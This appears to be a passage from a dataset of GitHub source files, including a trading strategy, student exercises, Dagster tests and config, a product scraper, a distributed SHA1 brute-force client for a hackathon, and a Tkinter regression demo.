0.32634\n trailing_stop_positive_offset = 0.34487 \n\n # Optimal ticker interval for the strategy\n ticker_interval = '1m'\n\n def populate_indicators(self, dataframe: DataFrame, metadata: dict) -> DataFrame:\n dataframe['adx'] = ta.ADX(dataframe, timeperiod=14)\n dataframe['plus_di'] = ta.PLUS_DI(dataframe, timeperiod=25)\n dataframe['minus_di'] = ta.MINUS_DI(dataframe, timeperiod=25)\n dataframe['sar'] = ta.SAR(dataframe)\n dataframe['mom'] = ta.MOM(dataframe, timeperiod=14)\n\n return dataframe\n\n def populate_buy_trend(self, dataframe: DataFrame, metadata: dict) -> DataFrame:\n dataframe.loc[\n (\n (dataframe['mom'] < 0) &\n (dataframe['minus_di'] > 48) &\n (dataframe['plus_di'] < dataframe['minus_di'])\n\n ),\n 'buy'] = 1\n \n return dataframe\n\n def populate_sell_trend(self, dataframe: DataFrame, metadata: dict) -> DataFrame:\n dataframe.loc[\n (\n (dataframe['mom'] > 0) &\n (dataframe['minus_di'] > 48) &\n (dataframe['plus_di'] > dataframe['minus_di'])\n\n ),\n 'sell'] = 1\n return dataframe","repo_name":"davidzr/freqtrade-strategies","sub_path":"strategies/adx_opt_strat/adx_opt_strat.py","file_name":"adx_opt_strat.py","file_ext":"py","file_size_in_byte":2159,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"53"} +{"seq_id":"21822322308","text":"import numpy as np\n\ndef minmax(x):\n if 
(isinstance(x, np.ndarray) == True):\n x = np.squeeze(x)\n if (x.ndim == 1 and len(x) != 0):\n new = []\n if (np.max(x) - np.min(x) != 0):\n for t in x:\n new.append((float(t - np.min(x)) ) / (float(np.max(x) - np.min(x))))\n return np.array(new)\n return None\n\nif __name__ == '__main__':\n\n X = np.array([0, 15, -9, 7, 12, 3, -21]).reshape((-1, 1))\n print(minmax(X))\n Y = np.array([2, 14, -13, 5, 12, 4, -19]).reshape((-1, 1))\n print(minmax(Y))","repo_name":"yodana/ml01","sub_path":"ex06/minmax.py","file_name":"minmax.py","file_ext":"py","file_size_in_byte":574,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"16323187634","text":"# Projede ilk olarak url'ler ayarlanmalıdır.\nfrom django.urls import path # Django ile alakalı Pylance(reportMissingModuleSource) hatası alındığında Pylance kütüphanesi, Extensions bölümünden disable yapılmalıdır.\nfrom . import views \nurlpatterns = [\n path('',views.homepage,name=\"home\"),\n path('developer/',views.developer,name=\"developer\"),\n path('about/',views.about,name=\"about\"),\n path('create/',views.create,name=\"create\"),\n path('delete/',views.delete,name=\"delete\"),\n path('yes_finish/',views.yes_finish,name=\"yes_finish\"),\n path('no_finish/',views.no_finish,name=\"no_finish\"),\n path('update/',views.update,name=\"update\"),\n \n # \"\"\"\n # # path('', views.home), \n # Bu sayfa, template olmadan request yapıldığında karşılaşılan sayfadır.\n # \"\"\"\n \n \n]","repo_name":"yasinramazangok/MyAgenda","sub_path":"Myagenda/agenda/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":864,"program_lang":"python","lang":"tr","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"19380948293","text":"# Course: IT1 1120\n# Assignment number: 2\n# Family name, Given name: Tara, Sahil\n# Student number: 300018569\n\n########################\n# Question 1\n########################\ndef min_enclosing_rectangle(radius, x, y):\n \"\"\"(number, number, number) -> (number, number) or None\n\n Preconditions: radius >= 0\n \n Return the x and y of the bottom left corner of the rectangle\n enclosing a circle with a radius of radius and centered about x, y.\n If radius is negative returns nothing.\n \"\"\"\n if radius >= 0:\n return(x-radius, y-radius)\n \n########################\n# Question 2\n########################\ndef series_sum():\n \"\"\"(None) -> number or None\n\n Preconditions: n given by user is a non negative integer\n \n Return the sum of the series 1000 + (1/1)^2 + (1/2)^2 + (1/3)^2 (1/n)^2.\n if entered number is negative returns nothing.\n \"\"\"\n n = int(input(\"Please enter a non-negative integer: \"))\n sumer = 1000\n if n >= 0:\n for i in range(1, n + 1):\n sumer += 1/i ** 2\n return sumer\n \n########################\n# Question 3\n########################\ndef pell(n):\n \"\"\"(int) -> int or None\n\n Preconditions: n >= 0:\n \n Returns nth pell number if n >= 0 returns nothing otherwise.\n \"\"\"\n if n >= 0:\n second_last = 0\n last = 1\n answer = 0\n if n == 0:\n answer = 0\n elif n == 1:\n answer = 1\n elif n > 1:\n for i in range(2, n + 1):\n answer = 2 * last + second_last\n if i < n:\n second_last = last\n last = answer\n return answer\n########################\n# Question 4\n########################\ndef countMembers(s):\n \"\"\"(str) -> int\n\n Returns the number of extraordinary characters within a string.\n Extraordinary numbers are:\n F to X upper cased letters,\n e to j lower cased,\n Numerals between 2 and 6,\n \"!\",\n 
\",\",\n and \"\\\".\n \"\"\"\n num = 0\n for ch in s:\n if ch in \"FGHIJKLMNOPQRSTUVWXefghij23456!\\\\,\":\n num += 1\n return num\n\n########################\n# Question 5\n########################\ndef casual_number(s):\n \"\"\"(str) -> int or None\n Return nothing if s is not a number.\n Return comma-less integer from s if s is a number.\n \"\"\"\n s = s.replace(\",\", \"\")\n if s[1:].isnumeric():\n return int(s)\n\n########################\n# Question 6\n########################\ndef alienNumbers(s):\n \"\"\"(str) -> int\n Return the alien number for a string s where T=1024,y=598,!=121, a=42, N=6, U=1\n \"\"\"\n return s.count(\"T\") * 1024 + s.count(\"y\") * 598 + s.count(\"!\") * 121 + s.count(\"a\") * 42 + s.count(\"N\") * 6 + s.count(\"U\")\n\n########################\n# Question 7\n########################\ndef alienNumbersAgain(s):\n \"\"\"(str) -> int\n Return the alien number for a string s where T=1024,y=598,!=121, a=42, N=6, U=1 without the use of string functions.\n \"\"\"\n num = 0\n for ch in s:\n if ch == \"T\":\n num += 1024\n elif ch == \"y\":\n num += 598\n elif ch == \"!\":\n num += 121\n elif ch == \"a\":\n num += 42\n elif ch == \"N\":\n num += 6\n elif ch == \"U\":\n num += 1\n return num\n\n########################\n# Question 8\n########################\ndef encrypt(s):\n \"\"\"(str) -> str\n Returns an encrypted version of s.\n \"\"\"\n s = s[::-1]\n encrypted = \"\"\n length = len(s)\n if length <= 1:\n encrypted = s\n else:\n for i in range(length // 2):\n encrypted += s[i] + s[length - i - 1]\n if length % 2 != 0:\n encrypted += s[length // 2]\n return encrypted\n\n########################\n# Question 9\n########################\ndef oPify(s):\n \"\"\"(str) -> str\n Returns a string with the letters o and p between\n consecutive characters. If the first letter is a capital\n the o is capitalized, if not the o is lower case. 
If\n the second letter is capitalized the p is capitalized,\n if not the p is lower case.\n \"\"\"\n oped = \"\"\n num = 1\n if len(s) > 1:\n for ch in s:\n if ch in \"ABCDEFGHIJKLMNOPQRSTUVWXYZ\":\n if num > 1:\n if s[num-2].isalpha():\n oped += \"P\" + ch\n else:\n oped += ch\n if num != len(s) and s[num].isalpha():\n oped += \"O\"\n elif s[num].isalpha():\n oped += ch + \"O\"\n else:\n oped += ch\n elif ch in \"abcdefghijklmnopqrstuvwxyz\":\n if num > 1:\n if s[num-2].isalpha():\n oped += \"p\" + ch\n else:\n oped += ch\n if num != len(s) and s[num].isalpha():\n oped += \"o\"\n elif s[num].isalpha():\n oped += ch + \"o\"\n else:\n oped += ch\n else:\n oped += ch\n num += 1\n else:\n oped = s\n return oped\n\n########################\n# Question 10\n########################\ndef nonrepetitive(s):\n \"\"\"(str) -> bool\n Preconditions: s does not contain spaces.\n Returns whether or not any substring in s repeats consecutively.\n \"\"\"\n length = len(s)\n state = True\n for i in range(length):\n for j in range(i,length):\n s1 = s[i:j].strip()\n s2 = s[j:2*j - i].strip()\n if s1 == s2 and s1 != \"\" != s2:\n state = False\n \n return state\n","repo_name":"SahilTara/ITI1120","sub_path":"ASSIGNMENTS/Assignment 2/a2_300018569/a2_part2_300018569.py","file_name":"a2_part2_300018569.py","file_ext":"py","file_size_in_byte":5740,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"38184207066","text":"# -*- coding:utf-8 -*- #\r\n'''\r\nCreated on 2017-1-7\r\n@author: Leo\r\n'''\r\nimport re\r\nimport numpy as np\r\nimport urllib.request as ur\r\nimport urllib\r\nfrom lxml import etree\r\nfrom mongodb_writer import insert_into_mongodb\r\n\r\n\r\nclass Tmall_product:\r\n def get_page(self, page, product_name):\r\n page = ur.urlopen(\"https://list.tmall.com/search_product.htm?s=\" + str(page) + \"&q=\" + product_name + \"&sort=s&style=g&type=pc#J_Filter\")\r\n html = page.read().decode('GBK')\r\n page = re.findall(\"(?<=共)(.*?)(?=页)\", html)[0]\r\n return page\r\n\r\n def parser(self, page, product_name):\r\n data_list = []\r\n try:\r\n URL = \"https://list.tmall.com/search_product.htm?s=\" + str(page) + \"&q=\" + product_name + \"&sort=s&style=g&type=pc#J_Filter\"\r\n print(URL)\r\n page = ur.urlopen(URL)\r\n html = page.read().decode('GBK')\r\n selector = etree.HTML(html)\r\n except Exception as err:\r\n print(err)\r\n \r\n link_name = selector.xpath('//div[@class=\"productTitle productTitle-spu\"]/a[1]/@title')\r\n data_list.append(link_name)\r\n \r\n link = selector.xpath('//div[@class=\"productTitle productTitle-spu\"]/a[1]/@href')\r\n data_list.append(link)\r\n \r\n insert_into_mongodb(data_list, \"TmallProduct\")\r\n\r\n def controller(self):\r\n data = urllib.parse.quote(\"耳机\", encoding = \"GBK\")\r\n page = self.get_page(page=0, product_name=data)\r\n page_list = np.arange(0, 60*int(page), 60).tolist()\r\n for page in page_list:\r\n self.parser(page=page, product_name=data)\r\n #self.parser(0, data)\r\n\r\nTmall = Tmall_product()\r\nTmall.controller()\r\n","repo_name":"sunhailin-Leo/TaoBao_Tmall_Spider","sub_path":"Tmall/Tmall_product.py","file_name":"Tmall_product.py","file_ext":"py","file_size_in_byte":1703,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"6461284482","text":"# 4 Найти максимальное из трех чисел\n\nfrom random import randint \nlist = [randint(1,100) for i in range(3)]\nprint(list)\n\n# max=list[0]\n\ndef max_from_three (x,y,z):\n max = x\n for i in 
range(1,3):\n if list[i]>max: max=list[i]\n return max\n\nmax_from_three(list[0], list[1], list[2])\nprint (max)\n\n# for i in range(1,3):\n# if list[i]>max: max=list[i]\n\n# print (f'максимальное число - {max}')\n\n# # def GetRandom(): \n# # return l=randint(0,100)\n# list=[]\n# for i in range (3):\n# list=randint(0, 10)\n# print (list)\n\n# print (list)\n\n# # def PrintArray (array):\n# # while i<3: print (A[i])\n\n\n# # for i in range (1,n+1):\n\n# # F=F*\n\n# # int i=0; //лучше делать через for так не будет проблем с реопредлением i\n\n# # i=0;\n\n\n# # int max=0;\n# # int[] A = new int [3];\n\n# # while (i<3)\n\n# # {\n\n# # A[i]=GetRandom();\n\n# # i++;\n\n","repo_name":"vlasek/python_1","sub_path":"seminar1/4.py","file_name":"4.py","file_ext":"py","file_size_in_byte":938,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9890819237","text":"import logging\nfrom contextlib import contextmanager\n\nimport pytest\nfrom dagster._utils.log import define_structured_logger\nfrom dagster._utils.test import create_test_pipeline_execution_context\n\n\n@contextmanager\ndef construct_structured_logger(constructor=lambda x: x):\n messages = []\n\n def _append_message(logger_message):\n messages.append(constructor(logger_message))\n\n logger_def = define_structured_logger(\"some_name\", _append_message, level=logging.DEBUG)\n yield logger_def, messages\n\n\ndef test_structured_logger_in_context():\n with construct_structured_logger() as (logger, messages):\n context = create_test_pipeline_execution_context(logger_defs={\"structured_log\": logger})\n context.log.debug(\"from_context\", extra={\"foo\": 2})\n assert len(messages) == 1\n message = messages[0]\n assert message.name == \"some_name\"\n assert message.level == logging.DEBUG\n assert message.record.__dict__[\"foo\"] == 2\n assert message.meta[\"orig_message\"] == \"from_context\"\n\n\ndef test_structured_logger_in_context_with_bad_log_level():\n messages = []\n\n def _append_message(logger_message):\n messages.append(logger_message)\n\n logger = define_structured_logger(\"some_name\", _append_message, level=logging.DEBUG)\n context = create_test_pipeline_execution_context(logger_defs={\"structured_logger\": logger})\n with pytest.raises(AttributeError):\n context.log.gargle(\"from_context\")\n","repo_name":"dagster-io/dagster","sub_path":"python_modules/dagster/dagster_tests/general_tests/utils_tests/log_tests/test_structured_logging.py","file_name":"test_structured_logging.py","file_ext":"py","file_size_in_byte":1468,"program_lang":"python","lang":"en","doc_type":"code","stars":8986,"dataset":"github-code","pt":"53"} +{"seq_id":"3374945259","text":"from collections import Counter\nfrom itertools import chain\n\nfrom entity_network.clean_text import comparison_rules\nfrom entity_network import parse_components\n\ndef main(values, category):\n\n # apply category specific or general component parser\n if category=='address':\n parsed = parse_components.address(values[category])\n elif category=='phone':\n parsed = parse_components.phone(values[category])\n else:\n delimiter = comparison_rules[category]['comparer']\n parsed = parse_components.common(values[category], delimiter=delimiter)\n\n # alias names for later merges that include multiple categories\n alias = {'parsed': f'{category}_normalized', 'components': f'{category}_difference'}\n\n # include source column descriptions if provided\n plan = {'parsed': list, 'components': list}\n list_unique_notna = lambda x: 
list(x.drop_duplicates().dropna())\n if 'df2_column' in values:\n parsed['df2_column'] = values['df2_column']\n plan = {**{'df2_column': list_unique_notna}, **plan}\n alias = {**{'df2_column': f'df2_column_{category}'}, **alias}\n if 'df_column' in values:\n parsed['df_column'] = values['df_column']\n plan = {**{'df_column': list_unique_notna}, **plan}\n alias = {**{'df_column': f'df_column_{category}'}, **alias}\n\n # group components by id\n summary = parsed.groupby(values.index.name)\n summary = summary.agg(plan)\n\n # calculate the difference in components\n summary['components'] = summary['components'].apply(_term_diff)\n\n # rename columns to reflect category for later merging and after difference is found\n summary = summary.rename(columns=alias)\n\n return summary\n\ndef _term_diff(values):\n\n if values[0] is None or values[1] is None:\n return None\n\n frequency = Counter(chain(*values))\n difference = ['='.join(key) for key,val in frequency.items() if val==1 and key[1] is not None]\n\n return difference","repo_name":"jwcook23/entity_network","sub_path":"entity_network/_find_difference.py","file_name":"_find_difference.py","file_ext":"py","file_size_in_byte":1955,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9891897927","text":"from dagster import Field, Float, Noneable, StringSource\nfrom dagster._core.host_representation import IN_PROCESS_NAME\nfrom dagster._utils.merger import merge_dicts\nfrom dagster_celery.executor import CELERY_CONFIG\nfrom dagster_k8s import DagsterK8sJobConfig\nfrom dagster_k8s.client import DEFAULT_WAIT_TIMEOUT\n\nCELERY_K8S_CONFIG_KEY = \"celery-k8s\"\n\n\ndef celery_k8s_executor_config():\n # DagsterK8sJobConfig provides config schema for specifying Dagster K8s Jobs\n job_config = DagsterK8sJobConfig.config_type_job()\n\n additional_config = {\n \"load_incluster_config\": Field(\n bool,\n is_required=False,\n default_value=True,\n description=\"\"\"Set this value if you are running the launcher within a k8s cluster. If\n ``True``, we assume the launcher is running within the target cluster and load config\n using ``kubernetes.config.load_incluster_config``. Otherwise, we will use the k8s config\n specified in ``kubeconfig_file`` (using ``kubernetes.config.load_kube_config``) or fall\n back to the default kubeconfig. Default: ``True``.\"\"\",\n ),\n \"kubeconfig_file\": Field(\n Noneable(str),\n is_required=False,\n description=\"Path to a kubeconfig file to use, if not using default kubeconfig.\",\n ),\n \"job_namespace\": Field(\n StringSource,\n is_required=False,\n description=(\n \"The namespace into which to launch new jobs. Note that any \"\n \"other Kubernetes resources the Job requires (such as the service account) must be \"\n 'present in this namespace. 
Default: ``\"default\"``'\n ),\n ),\n \"repo_location_name\": Field(\n StringSource,\n is_required=False,\n default_value=IN_PROCESS_NAME,\n description=\"The repository location name to use for execution.\",\n ),\n \"job_wait_timeout\": Field(\n Float,\n is_required=False,\n default_value=DEFAULT_WAIT_TIMEOUT,\n description=(\n \"Wait this many seconds for a job to complete before marking the run as failed.\"\n f\" Defaults to {DEFAULT_WAIT_TIMEOUT} seconds.\"\n ),\n ),\n }\n\n cfg = merge_dicts(CELERY_CONFIG, job_config)\n cfg = merge_dicts(cfg, additional_config)\n return cfg\n\n\ndef get_celery_engine_config(image_pull_policy=None, additional_env_config_maps=None):\n job_config = get_celery_engine_job_config(image_pull_policy, additional_env_config_maps)\n return {\"execution\": {CELERY_K8S_CONFIG_KEY: {\"config\": job_config[\"execution\"][\"config\"]}}}\n\n\ndef get_celery_engine_job_config(image_pull_policy=None, additional_env_config_maps=None):\n return {\n \"execution\": {\n \"config\": merge_dicts(\n {\n \"job_namespace\": {\"env\": \"DAGSTER_K8S_PIPELINE_RUN_NAMESPACE\"},\n \"env_config_maps\": [\n {\"env\": \"DAGSTER_K8S_PIPELINE_RUN_ENV_CONFIGMAP\"},\n ]\n + (additional_env_config_maps if additional_env_config_maps else []),\n },\n (\n {\n \"image_pull_policy\": image_pull_policy,\n }\n if image_pull_policy\n else {}\n ),\n )\n }\n }\n","repo_name":"dagster-io/dagster","sub_path":"python_modules/libraries/dagster-celery-k8s/dagster_celery_k8s/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":3455,"program_lang":"python","lang":"en","doc_type":"code","stars":8986,"dataset":"github-code","pt":"53"} +{"seq_id":"589673529","text":"import socket\nimport string_utils\nimport math\nimport encoder_decoder\nimport message\nimport itertools as it\nimport time\n\n# client configuration #\n\nBROADCAST = \"255.255.255.255\"\nSERVER_PORT = 3117\nTEAM_NAME = ';Drop table students; --'\nOFFER_TIMEOUT = 1\nACK_TIMEOUT = 30\nNUM_OF_LETTERS = 26\nWORKERS = []\n\nclient_sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\nenc_dec = encoder_decoder.Encoder_decoder()\n\n\n\ndef main():\n hashed_string = input('Welcome to ' + TEAM_NAME + '.' 
+ ' Please enter the hash:\\n')\n    if not_valid(hashed_string):\n        return\n    str_length = input('Please enter the input string length:\\n')\n    str_length = int(str_length)\n    send_discover()\n    wait_for_offers()\n    jobs = create_jobs(str_length, len(WORKERS))\n    send_requests(WORKERS, jobs, hashed_string)\n    ans = wait_for_ack()\n    print('The input string is ' + ans)\n\n\ndef send_requests(workers, jobs, hashed_string):\n    i = 0\n    for worker in workers:\n        send_request(worker, jobs[i], hashed_string)\n        i = i + 1\n\n\ndef send_request(worker, job, hashed_string):\n    length = len(job[0])\n    req_msg = message.Message(TEAM_NAME, message.REQUEST, hashed_string, length, job[0], job[1])\n    encoded_msg = enc_dec.encode(req_msg)\n    client_sock.sendto(encoded_msg, (worker[0], SERVER_PORT))\n\n\ndef send_discover():\n    discover_msg = message.Message(TEAM_NAME, message.DISCOVER, \"\", 1, \"\", \"\")\n    encoded = enc_dec.encode(discover_msg)\n    client_sock.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)\n    client_sock.sendto(encoded, (BROADCAST, SERVER_PORT))\n\n\ndef wait_for_offers():\n    client_sock.settimeout(OFFER_TIMEOUT)\n    try:\n        while 1:\n            # use a local name so the imported message module is not shadowed\n            (msg, server_address) = client_sock.recvfrom(2048)\n            WORKERS.append(server_address)\n    except socket.timeout:\n        return\n\n\ndef split_to_chunks(lst, each):\n    return list(it.zip_longest(*[iter(lst)] * each))\n\n\ndef divide(length, num_servers):\n    start = 'a' * length\n    end = 'z' * length\n    search_space = string_utils.Ranger(start, end)\n    num_strings = NUM_OF_LETTERS ** length\n    strings = search_space.generate_all_from_to_of_len()\n    each = math.ceil(num_strings / num_servers)\n    chunks = split_to_chunks(strings,each)\n    return chunks\n\n\ndef create_jobs(length, num_servers):\n    jobs = []\n    chunks = string_utils.split_fairly(length,num_servers)\n    for chunk in chunks:\n        jobs.append((chunk[0], chunk[-1]))\n    return jobs\n\n\ndef not_valid(hashed_string):\n    length = len(hashed_string)\n    if length != 40:\n        print('Input string must be of length 40.')\n        return True\n    try:\n        sha_int = int(hashed_string, 16)\n    except ValueError:\n        print('Input string must be a sha1 hash.')\n        return True\n    return False\n\n\ndef wait_for_ack():\n    start_time = time.time()\n    # bound recvfrom by the ACK timeout; with settimeout(None) the call could\n    # block forever and the elapsed-time check below would never run\n    client_sock.settimeout(ACK_TIMEOUT)\n    while 1:\n        if time.time() - start_time > ACK_TIMEOUT:\n            return '[ACK timeout!]'\n        try:\n            (msg, server_address) = client_sock.recvfrom(2048)\n        except socket.timeout:\n            return '[ACK timeout!]'\n        decoded_msg = enc_dec.decode(msg)\n        if decoded_msg.type == message.ACK:\n            return decoded_msg.start\n        elif decoded_msg.type == message.NACK:\n            WORKERS.remove(server_address)\n\n        if len(WORKERS) == 0: # all servers returned NACK\n            return 'not found!'\n\n\nif __name__ == \"__main__\":\n    main()","repo_name":"chendoy/intro-to-nets-hackaton","sub_path":"client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":3345,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"70850428647","text":"from BaseApp import BaseApp\nimport tkinter as tk\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport scipy.stats as stats\nfrom sklearn.preprocessing import PolynomialFeatures\nfrom sklearn.linear_model import LinearRegression\nfrom sklearn.preprocessing import KBinsDiscretizer\nfrom sklearn.neighbors import KNeighborsRegressor\n\ndef true_funct(x):\n\treturn np.sin(x)\n\ndef sample_data(N,stddevX,stddevY):\n\tx = stats.norm(loc=0,scale=stddevX).rvs(N)\n\ty = true_funct(x) + stats.norm(scale=stddevY).rvs(N)\n\treturn x, y\n\ndef get_contour_data(stddevX,stddevY):\n\tnx, ny = (100, 100)\n\tx = np.linspace(-6, 6,
nx)\n\ty = np.linspace(-1.8, 1.8, ny)\n\tXg, Yg = np.meshgrid(x, y)\n\tXg = Xg.T\n\tYg = Yg.T\n\tZ = np.empty((nx, ny))\n\tfor i, xx in enumerate(x):\n\t\tZ[i, :] = stats.norm.pdf(y, loc=true_funct(xx), scale=stddevY)\n\tfor i, yy in enumerate(y):\n\t\tZ[:, i] *= stats.norm.pdf(x, loc=0, scale=stddevX)\n\tZ /= sum(sum(Z))\n\treturn Xg, Yg, Z\n\nclass MetaModel:\n\n\tdef eval_perf(self,param, D):\n\t\tif D is None:\n\t\t\treturn np.nan, np.nan, np.nan, np.nan\n\t\tX, Y = D\n\t\tif len(Y)==0:\n\t\t\treturn np.nan, np.nan, np.nan, np.nan\n\t\telse:\n\t\t\tYhat = self.predict(param, X)\n\t\t\tybar = np.mean(Y)\n\t\t\tmse = np.mean((Y-Yhat)**2)\n\t\t\tmae = np.mean(np.abs(Y-Yhat))\n\t\t\tmape = np.mean(np.abs(Y-Yhat)/np.abs(Y))\n\t\t\tR2 = 1 - mse / np.mean((Y-ybar)**2)\n\t\t\treturn mse, mae, mape, R2\n\n\t\t\n\tdef __init__(self,param_space,Dtrain,Dtest):\n\n\t\t# parameter range\n\t\tself.param_space = param_space\n\n\t\t# sweep parameter space\n\t\tXtrain,Ytrain = Dtrain\n\t\tXtrain = Xtrain.reshape(-1, 1)\n\t\tself.modeldict = dict()\n\t\tfor param in self.param_space:\n\t\t\tself.modeldict[param] = self.train_one(param,Xtrain,Ytrain)\n\n\t\t# compute test and train performance\n\t\tself.train_perf = np.array([self.eval_perf(param,Dtrain) for param in self.param_space])\n\t\tself.test_perf = np.array([self.eval_perf(param,Dtest) for param in self.param_space])\n\n\tdef predict(self, param, X): pass\n\tdef train_one(self,param,Xtrain,Ytrain): pass\n\n\tdef update_test_perf(self,Dtest):\n\t\tself.test_perf = np.array([self.eval_perf(param,Dtest) for param in self.param_space])\n\nclass MetaLinearRegression(MetaModel):\n\n\tdef train_one(self,param,Xtrain,Ytrain):\n\t\tq = param\n\t\tpoly = PolynomialFeatures(q, include_bias=False).fit(Xtrain)\n\t\tphi_train = poly.transform(Xtrain)\n\t\tmodel = LinearRegression().fit(phi_train, Ytrain)\n\t\treturn {'poly': poly, 'model': model}\n\n\tdef predict(self,param,X):\n\t\tmodel = self.modeldict[param]\n\t\tpoly = model['poly']\n\t\tlr = model['model']\n\t\treturn lr.predict(poly.fit_transform(X.reshape(-1, 1)))\n\nclass MetaKBins(MetaModel):\n\n\tdef train_one(self,param,Xtrain,Ytrain):\n\t\tn_bins = param\n\t\tenc = KBinsDiscretizer(n_bins=n_bins,encode='ordinal',subsample=200_000,strategy='quantile')\n\t\tX_binned = enc.fit_transform(Xtrain.reshape(-1, 1))\n\t\tybin = np.empty(n_bins)\n\t\tfor i in range(n_bins):\n\t\t\tind = i==X_binned[:, 0]\n\t\t\tif not np.any(ind):\n\t\t\t\tybin[i] = np.nan\n\t\t\telse:\n\t\t\t\tybin[i] = np.mean(Ytrain[ind])\n\t\treturn {'enc':enc,'ybin':ybin}\n\n\tdef predict(self,param,X):\n\t\tmodel = self.modeldict[param]\n\t\tenc = model['enc']\n\t\tybin = model['ybin']\n\t\treturn np.array([ybin[int(i)] for i in enc.transform(X.reshape(-1, 1))[:, 0]])\n\nclass MetaKNN(MetaModel):\n\n\tdef train_one(self,param,Xtrain,Ytrain):\n\t\tn_neighbors = param\n\t\tmodel = KNeighborsRegressor(n_neighbors=n_neighbors) \\\n\t\t\t.fit(Xtrain.reshape(-1, 1), Ytrain)\n\t\treturn {'model': model}\n\n\tdef predict(self,param,X):\n\t\tmodel = self.modeldict[param]\n\t\tknn = model['model']\n\t\treturn knn.predict(X.reshape(-1, 1))\n\nclass TkContainer(BaseApp):\n\n\tmetamodel_names = ['K-bins','KNN','Linear regression']\n\tmetamodel_info = {\n\t\t'K-bins':{\n\t\t\t'param':'# of bins K',\n\t\t\t'param_space':np.arange(2, 10)\n\t\t},\n\t\t'KNN':{\n\t\t\t'param':'# of neighbors K',\n\t\t\t'param_space':np.arange(2, 10)\n\t\t},\n\t\t'Linear regression':{\n\t\t\t'param':'polynomial order',\n\t\t\t'param_space': np.arange(1, 
8)\n\t\t}\n\t}\n\ttrain_plt = None\n\ttest_plt = None\n\n\tdef __init__(self):\n\t\tsuper(TkContainer, self).__init__(\n\t\t\ttitle=\"Supervised learning demo\",\n\t\t\tgeometry=\"1400x800\",\n\t\t\tfigsize=(12, 4),\n\t\t\tsubplots=(2,1))\n\n\tdef initialize_parameters(self):\n\n\t\tself.stddevX = tk.DoubleVar(master=self.root, value=2)\n\t\tself.stddevXstr = tk.StringVar(master=self.root, value='2.0')\n\n\t\tself.stddevY = tk.DoubleVar(master=self.root, value=0.3)\n\t\tself.stddevYstr = tk.StringVar(master=self.root, value='0.3')\n\n\t\tself.Ntrain = tk.IntVar(master=self.root, value=0)\n\t\tself.Ntrainstr = tk.StringVar(master=self.root, value='0')\n\n\t\tself.Ntest = tk.IntVar(master=self.root, value=0)\n\t\tself.Nteststr = tk.StringVar(master=self.root, value='0')\n\n\t\tself.param = tk.IntVar(master=self.root, value=2)\n\t\tself.paramstr = tk.StringVar(master=self.root, value='2')\n\n\t\tself.show_pXY = tk.BooleanVar(master=self.root, value=False)\n\t\tself.show_function = tk.BooleanVar(master=self.root, value=False)\n\t\tself.show_model = tk.BooleanVar(master=self.root, value=False)\n\t\tself.show_sweep = tk.BooleanVar(master=self.root, value=False)\n\n\t\tself.selected_model = tk.StringVar(master=self.root, value='K-bins')\n\n\tdef initialize_data(self):\n\t\tself.Dtrain= sample_data(self.Ntrain.get(),self.stddevX.get(),self.stddevY.get())\n\t\tself.Dtest = sample_data(self.Ntest.get(),self.stddevX.get(),self.stddevY.get())\n\t\tself.build_model()\n\n\tdef add_widgets(self):\n\n\t\theader_width = 40\n\n\t\t# xy checkbox ........................................\n\t\tself.get_checkbox(self.root, text='Show XY distribution',variable=self.show_pXY, command=self.click_pXY_checkbox)\\\n\t\t\t.pack(side=tk.TOP, fill=tk.X)\n\n\t\t# function checkbox ........................................\n\t\tself.get_checkbox(self.root, text='Show true function',variable=self.show_function, command=self.click_function_checkbox)\\\n\t\t\t.pack(side=tk.TOP, fill=tk.X)\n\n\t\t# stddev X input box ......................................\n\t\tself.get_entry_label(self.root,\n\t\t\t\t\t\ttext=\"stddev X\",\n\t\t\t\t\t\ttextvariable=self.stddevXstr,\n\t\t\t\t\t\tvalidatecommand=self.set_stddevX)\\\n\t\t\t.pack(side=tk.TOP, fill=tk.X)\n\n\t\t# stddev Y input box ......................................\n\t\tself.get_entry_label(self.root,\n\t\t\t\t\t\ttext=\"stddev Y\",\n\t\t\t\t\t\ttextvariable=self.stddevYstr,\n\t\t\t\t\t\tvalidatecommand=self.set_stddevY)\\\n\t\t\t.pack(side=tk.TOP, fill=tk.X)\n\n\t\t# Header data ------------------------------------------\n\t\tself.get_header(self.root,text='Training data',char='.',width=header_width)\\\n\t\t\t.pack(side=tk.TOP, fill=tk.X)\n\n\t\t# N train input box ......................................\n\t\tself.get_entry_label(self.root,\n\t\t\t\t\t\ttext=\"N train\",\n\t\t\t\t\t\ttextvariable=self.Ntrainstr,\n\t\t\t\t\t\tvalidatecommand=self.set_Ntrain)\\\n\t\t\t.pack(side=tk.TOP, fill=tk.X)\n\n\t\t# resample train button ......................................\n\t\tself.get_button(self.root,text=\"Resample train\",command=self.press_resample_train)\\\n\t\t\t.pack(side=tk.TOP, fill=tk.X)\n\n\t\t# Header Model ----------------------------------------\n\t\tself.get_header(self.root,'Model',char='.',width=header_width)\\\n\t\t\t.pack(side=tk.TOP, fill=tk.X)\n\n\t\t# model checkbox ........................................\n\t\tself.get_checkbox(self.root, text='Show model',variable=self.show_model, command=self.click_model_checkbox)\\\n\t\t\t.pack(side=tk.TOP, 
